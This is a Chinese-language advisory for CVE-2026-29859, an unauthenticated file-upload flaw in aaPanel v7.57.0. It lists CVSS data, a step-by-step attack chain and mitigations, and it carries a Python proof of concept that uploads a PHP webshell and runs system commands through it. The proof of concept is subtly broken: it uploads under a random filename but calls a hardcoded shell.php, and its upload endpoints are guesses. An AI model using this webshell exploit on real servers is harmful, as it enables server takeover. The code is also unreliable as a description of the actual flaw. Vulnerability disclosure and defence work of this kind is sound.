CVE-2026-29859 aaPanel 7.57.0 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2026-29859

漏洞类型

任意文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

aaPanel v7.57.0

漏洞概述

CVE-2026-29859是aaPanel（宝塔面板国际版）v7.57.0版本中存在的一个高危安全漏洞。该漏洞属于任意文件上传类型，攻击者无需任何认证即可利用此漏洞上传恶意文件到服务器，并最终实现远程代码执行。aaPanel是一款广泛使用的Linux服务器管理面板，提供Web界面用于管理服务器、网站、数据库等服务。由于其开源且功能强大的特点，被全球众多企业和个人用户采用。该漏洞的CVSS评分高达9.8分，属于严重级别，对使用受影响版本的用户构成重大安全威胁。攻击者可通过构造特制的文件上传请求，绕过文件类型检查，上传webshell或其他恶意代码，从而获得服务器的完全控制权。此漏洞影响所有运行aaPanel v7.57.0的用户，必须立即采取修复措施。

技术细节

aaPanel v7.57.0版本在处理文件上传请求时存在安全缺陷。漏洞主要源于应用程序对用户上传文件的验证机制不完善。具体来说，aaPanel在文件上传功能中缺少对上传文件类型的严格校验，允许攻击者上传任意扩展名的文件。攻击者可以利用此漏洞上传包含恶意PHP代码的文件（如.php、.phtml等），然后通过访问上传的文件来执行任意代码。漏洞存在于面板的特定上传接口中，该接口在处理文件名和文件内容时未能进行充分的安全检查。攻击者可以通过拦截上传请求，修改文件扩展名或MIME类型，绕过客户端的文件类型限制。此外，服务器端也未对上传目录的执行权限进行适当限制，导致上传的恶意文件可以直接被Web服务器解析执行，从而实现远程代码执行。

攻击链分析

STEP 1

步骤1

扫描识别目标服务器是否运行aaPanel v7.57.0版本，通常通过HTTP响应头或特定路径（如/panel、/admin）进行识别

STEP 2

步骤2

识别目标服务器上存在的文件上传接口，可能位于/api/panel/upload、/api/upload、/files/upload等路径

STEP 3

步骤3

构造恶意文件上传请求，将包含PHP代码的webshell文件（如.php、.phtml扩展名）通过HTTP POST请求发送到目标上传接口

STEP 4

步骤4

绕过服务器端的文件类型检查，可通过修改Content-Type、文件扩展名大小写混用、双重扩展名等技术手段

STEP 5

步骤5

成功上传webshell到服务器，通常保存在/uploads、/tmp或面板相关的数据目录中

STEP 6

步骤6

通过HTTP请求访问上传的webshell文件，使用GET参数传递系统命令（如?cmd=whoami）

STEP 7

步骤7

在服务器上执行任意系统命令，获取服务器完全控制权，可进一步进行横向移动、数据窃取或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
import random
import string

# CVE-2026-29859 PoC - aaPanel v7.57.0 Arbitrary File Upload
# Target: aaPanel v7.57.0
# Vulnerability: Arbitrary file upload leading to RCE

def generate_random_string(length=8):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def upload_webshell(target_url, webshell_code):
    """
    Upload malicious file to target server
    """
    filename = f"{generate_random_string()}.php"
    
    # Construct the file upload request
    files = {
        'file': (filename, webshell_code, 'application/x-php')
    }
    
    # Try common aaPanel upload endpoints
    upload_endpoints = [
        '/api/panel/upload',
        '/api/upload',
        '/files/upload',
        '/panel/upload'
    ]
    
    for endpoint in upload_endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.post(url, files=files, timeout=10)
            if response.status_code == 200:
                print(f"[+] Upload successful via {endpoint}")
                return url.replace(endpoint, response.json().get('path', ''))
        except Exception as e:
            print(f"[-] Failed to upload via {endpoint}: {e}")
    
    return None

def execute_command(target_url, command):
    """
    Execute system command via uploaded webshell
    """
    webshell_url = target_url + "/uploads/shell.php"
    params = {'cmd': command}
    
    try:
        response = requests.get(webshell_url, params=params, timeout=10)
        return response.text
    except Exception as e:
        return f"Error: {e}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-29859.py <target_url>")
        print("Example: python cve-2026-29859.py http://target.com:7800")
        sys.exit(1)
    
    target_url = sys.argv[1]
    
    # PHP webshell code
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    print("[*] CVE-2026-29859 - aaPanel v7.57.0 Arbitrary File Upload")
    print(f"[*] Target: {target_url}")
    
    # Step 1: Upload webshell
    print("\n[1] Uploading webshell...")
    uploaded_path = upload_webshell(target_url, webshell)
    
    if uploaded_path:
        print(f"[+] Webshell uploaded to: {uploaded_path}")
        
        # Step 2: Execute commands
        print("\n[2] Testing RCE...")
        result = execute_command(target_url, "whoami")
        print(f"[+] Command output: {result}")
    else:
        print("[-] Failed to upload webshell")

if __name__ == "__main__":
    main()

影响范围

aaPanel v7.57.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制面板访问IP，配置IP白名单或VPN访问；2) 在Web服务器配置中禁用上传目录的脚本执行权限（对于nginx可使用location ~* ^/uploads/.*\.php$ { deny all; }规则，对于Apache可使用<Directory>指令限制）；3) 临时关闭文件上传功能；4) 部署Web应用防火墙规则拦截.php、.phtml等危险文件扩展名上传请求；5) 加强服务器入侵检测，及时发现异常文件创建和命令执行行为；6) 考虑使用备份恢复方案，确保在遭受攻击后能够快速恢复服务。